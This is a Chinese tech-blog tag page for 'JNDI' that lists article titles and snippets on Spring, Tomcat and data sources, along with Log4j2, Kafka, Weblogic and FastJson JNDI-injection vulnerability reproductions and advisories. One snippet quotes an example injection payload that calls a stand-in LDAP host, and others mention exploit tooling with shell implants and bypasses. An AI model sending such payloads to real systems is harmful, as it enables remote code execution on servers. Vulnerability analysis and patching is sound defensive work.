JNDI

使用Spring JDBC连接数据库

1.引言1.1Spring的数据访问哲学2.了解Spring的数据访问异常体系2.1不用写catch代码块3.数据访问模板化4.配置数据源4.1使用JNDI数据源4.2使用数据源连接池4.3基于JDBC
little-motor·2023-06-15 12:53

Spring框架有哪些主要模块?分别有哪些作用

SpringContext:Context封装包构建于Core封装包基础之上,提供了一种框架式的对象访问方法,有些类似于JNDI注册
luoluoal·2023-06-15 01:25

Spring Boot属性加载顺序

java:comp/env中的JNDI属性。Java的系统属性,可以通过System.getProperties(
法海你懂不·2023-06-14 09:08

Apache log4j2漏洞

log4j2提供了一个名为JndiLookup类的特殊功能,用于通过JNDI路径从LDAP服务器中查找对象。
永恒之蓝1489·2023-06-14 07:34

Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

复现环境以及使用的工具环境:使用Vulhub的漏洞环境工具:bp和JNDIExploit-1-1.2,需要Java环境!!
Mokapeng·2023-06-14 03:58

5. 依赖查找

5.1依赖查找前世今生单一类型依赖查找JNDI——javax.naming.Context#lookup(javax.naming.Name)JavaBeans——java.beans.beancontext.BeanContext
2档·2023-06-13 10:08

nc65开发the exception to client nc.bs.framework.exception.ComponentNotFoundException

nc.itf.riaorg.IHcontrastMaintain,DetailMessage:Thetxcomponent:nc.itf.riaorg.IHcontrastMaintainisnotfoundinjndipleased
晚秋情未眠·2023-06-12 15:38

Spring(三)--SpringIOC的依赖查找

JNDI也有依赖查找,Context类。SpringIOC单一类型依赖查找接口根据Bean名称查找:getBean(String)根据Bean类型查找:1.实时查找(getBean(Class))。
jazon@·2023-06-12 13:29

【高危】 Apache Kafka 远程代码执行漏洞复现及攻击拦截 (CVE-2023-25194)

攻击者可以利用基于SASLJAAS配置和SASL协议的任意Kafka客户端,对KafkaConnectworker创建或修改连接器时,通过构造特殊的配置,进行JNDI注入来实现远程代码执行。
·2023-06-12 11:16

jmeter 压测 ActiveMq 消息队列

QueueConnectionFactory:连接的名称JNDIna
飞天小子的性能课堂·2023-06-10 09:35

Spring源码深度解析:一、Spring整体架构和源码环境搭建

SpringContext:继承BeanFactory,提供上下文信息,扩展出JNDI、EJB、电子邮件、国际化等功能。Spri
代码的知行者·2023-06-10 06:27

JDBC和JNDI区别

引自:https://blog.csdn.net/fujunsfzh/article/details/53404167
endlessloop222·2023-06-10 00:41

Java EE开发系列教程 - 添加JPA模块

指定一个Datasource名称和JNDI名称。
前端罗欢·2023-06-09 16:02

CVE漏洞复现-CVE-2021-2109 Weblogic Server远程代码执行

CVE-2021-2109中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。该漏洞为Weblogic的远程代码执行漏洞,主要由JNDI注入,导致攻
私ははいしゃ敗者です·2023-06-08 23:39

EJB教程_编程入门自学教程_菜鸟教程-免费教程分享

,环境设置,应用服务器,容器,企业Bean,注释,会话,无状态会话,有状态会话,消息驱动,实体Bean,持久性,远程接口,查找,生命周期,接口,拦截器,可嵌入对象,Blob/Clobs,事务,安全性,JNDI
菜鸟一记·2023-04-20 20:31

Log4j2史诗级漏洞导致JNDI注入问题探析

背景ApacheLog4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中,比如在用户登录的时候打印一些异常信息,如xxx密码输入错误超过5次,账号被锁定;xxx账号已被锁定;xxx账号频繁异地登录。前不久,Apache开源项目Log4j的远程代
翎野君·2023-04-20 14:10

利用 Java Agent 动态修补 Log4j2 漏洞的好方法被我找到了

1、前言ApacheLog4j2JNDI注入漏洞(CVE-2021-44228)持续发酵,目前网络上提供了多种修补方案,如更新至最新版本、通过配置禁用lookup特性、删除org/apache/logging
「已注销」·2023-04-17 21:53

《Spring源码深度解析》

SpringContext:继承BeanFactory,提供上下文信息,扩展出JNDI、EJB、电子邮件、国际化等功能。SpringDAO:提供了JDBC的抽象层,还提供了声明性事务管理方法。
Byte空间·2023-04-17 04:48

CVE-2021-44228漏洞复现

Log4j-2中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成
YPL8·2023-04-16 21:51

Quartz官方教程翻译系列-Lesson 1

部分Quartz用户可能会在JNDI存储上持有一个工厂实例,其他使用者可能发觉直接实例化和使用工厂实例同样容易(或更容易)(正如以下的例子)。
很大气·2023-04-15 20:29

Spring诞生的背景

各大厂商为了占领市场,对规范制定也是大力支持,所以一起为J2EE定制了很多的规范:Servlet、JSP、JMS、JTA、JNDI、JDBC、RMI、JavaMail、XML、E
梦孤·2023-04-15 13:10

Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现

文章目录前言影响范围黑盒发现复现准备JNDILADPRMI漏洞复现Dnslog数据外带使用工具进行反弹shell防御与绕过防御绕过参考前言Apachelog4j是Apache的一个开源项目,Java的日志记录工具
今天是 几 号·2023-04-13 23:22

FastJson 反序列化漏洞原理分析

FastJson反序列化漏洞原理分析FastJson简介漏洞原理FastJson序列化操作序列化反序列化调用链分析原理利用过程分析RMI的实现JNDI服务器端代码构造总结1.fastjson利用过程2.
Buffedon·2023-04-13 14:54

Apache Log4j2 查找功能 JNDI 注入 (CVE-2021-44228)

Log4j的JNDI支持并没有限制可以解析的名称。一些协议像rmi:和ldap:是不安全的或者可以允许远程代码执行。复现过程首先进入vulhub靶
芝士TOM·2023-04-13 01:18

Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现

Log4j2在特定的版本中由于启用了lookup功能,导致存在JNDI漏洞。
未完成的歌~·2023-04-12 12:13

JNDI 注入漏洞的前世今生

前两天的log4j漏洞引起了安全圈的震动,虽然是二进制选手,但为了融入大家的过年氛围,还是决定打破舒适圈来研究一下JNDI注入漏洞。JNDI101首先第一个问题,什么是JNDI,它的作用是什么?
有价值炮灰·2023-04-11 19:45

Apache Log4j2 - JNDI RCE漏洞攻击保姆级教程(仅供测试请勿攻击他人)

ApacheLog4j2-JNDIRCE漏洞攻击保姆级教程(仅供测试请勿攻击他人)文章目录ApacheLog4j2-JNDIRCE漏洞攻击保姆级教程(仅供测试请勿攻击他人)一、前言二、被攻击端三、攻击端
格一物·2023-04-11 15:33

JNDI

开发JavaWeb应用,必须使用一个JavaWeb服务器,JavaWeb服务器都内置数据源。Tomcat:数据源只需要配置服务器即可。配置数据源的步骤:1、拷贝数据库连接的jar到tomcatlib目录下2、配置数据源XML文件a)如果把配置信息写在tomcat下的conf目录的context.xml中,那么所有应用都能使用此数据源。b)如果是在当前应用的META-INF中创建context.xm
神豪VS勇士赢·2023-04-11 09:44

Spring中获得dataSurce对象的方法

转载地址:http://www.oschina.net/code/snippet_117958_4699在Spring框架中有如下3种获得DataSource对象的方法:1.从JNDI获得DataSource
舟之桥·2023-04-08 20:22

Java反序列化和JNDI注入

一、反序列化常见利用类利用类的作用:加载类或者执行命令。//类加载(1)com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl(BeanComparator、EqualsBean/ToStringBean可以间接调用TemplatesImpl)(2)java.util.ServiceLoader$LazyIterator/com.sun
wespten·2023-04-07 07:32

Dubbo进阶

作用:做服务的扩展,使用SPI机制的优势是实现解耦,使得第三方服务模块的装配控制逻辑与调用者的业务代码分离简介:破坏双亲委派模型之一,在JNDI标准服务中,它存在的目的是对资源进行查找和集中管理,它需要
Alan Lei·2023-04-01 17:10

漏洞深度分析|CVE-2023-25141 sling-org-apache-sling-jcr-base存在JNDI注入漏洞

项目介绍ApacheSling提供对可插入资源提供程序的支持。虽然这允许将自定义数据提供程序非常灵活和高效地集成到Sling中,但这种集成是在Sling的资源API级别上完成的。可能依赖于能够将资源适配到JCR节点并继续使用JCRAPI的遗留代码将不适用于此类资源提供者。为了支持遗留代码,这个包提供了一个SPI接口org.apache.sling.jcr.base.spi.RepositoryMo
棱镜七彩·2023-04-01 05:08

漏洞预警|Apache Sling JCR Base 存在JNDI注入漏洞

棱镜七彩安全预警近日网上有关于开源项目ApacheSlingJCRBase存在JNDI注入漏洞,棱镜七彩威胁情报团队第一时间探测到,经分析研判,向全社会发起开源漏洞预警公告,提醒相关安全团队及时响应。
棱镜七彩·2023-04-01 05:38

开源漏洞深度分析|CVE-2022-34916 JNDI命令执行漏洞

项目地址WelcometoApacheFlume—ApacheFlume漏洞概述当攻击者控制目标LDAP服务器时,如果配置使用带有JNDILDAP数据源UR
棱镜七彩·2023-04-01 05:37

C3P0(数据库连接池)详解

一、定义C3P0是一个开源的JDBC连接池,它实现了数据源与JNDI绑定,支持JDBC3规范和实现了JDBC2的标准扩展说明的Connection和Statement池的DataSources对象。
five小点心·2023-03-31 18:59

什么是Spring上下文

Spring上下文包括企业服务,例如JNDI、EJB、电子邮件、国际化、校验和调度功能。Spring上下文就是系统启动的时候Spring会读取它的配置文件装载到上下文到内存,依赖注入...
水煮帝国·2023-03-31 18:58

Tomcat的基本使用及部署Java Web项目

包含13项技术规范:JDBC、JNDI、EJB、RMI、JSP、Serv
子修01·2023-03-29 05:49

使用JMX监控Tomcat示例代码

目录示例代码完整的示例代码文件示例代码StringjmxURL="service:jmx:rmi:///jndi/rmi://192.168.10.93:8999/jmxrmi";JMXServiceURLserviceURL
·2023-03-29 01:58

Log4j 严重漏洞修最新修复方案参考

CVE-2021-44228,原理上是log4j-core代码中的JNDI注入漏洞。这个漏洞可以直接导致服务器被入侵,而且由于“日志”场景的特性,攻击数据可以多层传导,甚至可以威胁到纯内网的服务器。
Javaesandyou·2023-03-28 21:48

day18_jdbc

模拟代码三、编写标准的数据源:javax.sql.DataSource接口四、Connection的close方法不要关闭链接装饰设计模式代理模式:静态代理动态代理五、开源数据源的使用DBCPC3P0JNDI
csdn_AF·2023-03-24 03:54

Jetty 简单安装和部署 jenkins

Jetty提供了一个web服务器和servlet容器,另外还提供了对HTTP/2、WebSocket、OSGi、JMX、JNDI、JAAS和许多其他集成的支持。
acc8226·2023-03-21 17:04

关于log4j2远程代码执行漏洞详细复现过程

1、漏洞重现说明log4j-2远程代码执行漏洞是因为log4j的版本中存在jndi(JavaNamingandDirectoryInterface)注入漏洞,jndi注入是利用的动态类加载机制完成攻击的
freeok·2023-03-17 00:41

2020-02-20

链接:https://pan.baidu.com/s/1XlofAJnDizpgH2BsgD2NAw提取码:qBm9眼神交流.E27.200217。
楚带宋·2023-03-15 23:50

log4j2漏洞原理详解、漏洞复现及漏洞利用

在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于`${jndi:ldap://evil.com/example}`的参数进行JNDI注入,执行任意代码
Cwillchris·2023-03-13 16:04

Apache Log4j2远程代码执行漏洞风险处理办法

1、漏洞描述一个ApacheLog4j2反序列化远程代码执行漏洞细节已被公开,ApacheLog4j-2中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码
净源·2023-03-11 12:44

关于Log4j2漏洞的排查、修复和检验

你自己的项目能换,如果像遇到es这种换不了的,你还是要面对log4j2三演示3.1.漏洞检测这里采用的是利用jndi访问ldap来测试经过测试我发现了个前提条件:必须手动加入log4j2的包
百恼神烦·2023-03-10 14:23

配合服务定位器模式使用JETPACK

介绍服务定位器模式服务定位器模式(ServiceLocatorPattern)用在我们想使用JNDI查询定位各种服务的时候。考虑到为某个服务查找JNDI的代价很高,服务定位器模式充分利用了缓存技术。
聪葱忙忘·2023-03-10 12:53

利用本地类突破JDK高版本限制进行JNDI注入

前言一般情况下,我们在进行JNDI注入时会参考JDK的版本限制,具体的修复可以参考下图JDK对于JNDI注入的修复但如果JDK大于图中版本时,就不能进行JNDI注入了吗?
清水川崎·2023-03-09 19:21

JNDIExploit使用方法

JNDIExploit一款用于JNDI注入利用的工具,大量参考/引用了RogueJNDI项目的代码,支持直接植入内存shell,并集成了常见的bypass高版本JDK的方式,适用于与自动化工具配合使用。
zxl2605·2023-03-01 09:14

TomCat连接池与JNDI

目录一、理解JNDI1.简介2.作用范围3.配置方法二、为什么要使用连接池?
千小半·2023-02-20 16:58
上一页 1 2 3 4 5 6 7 8 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他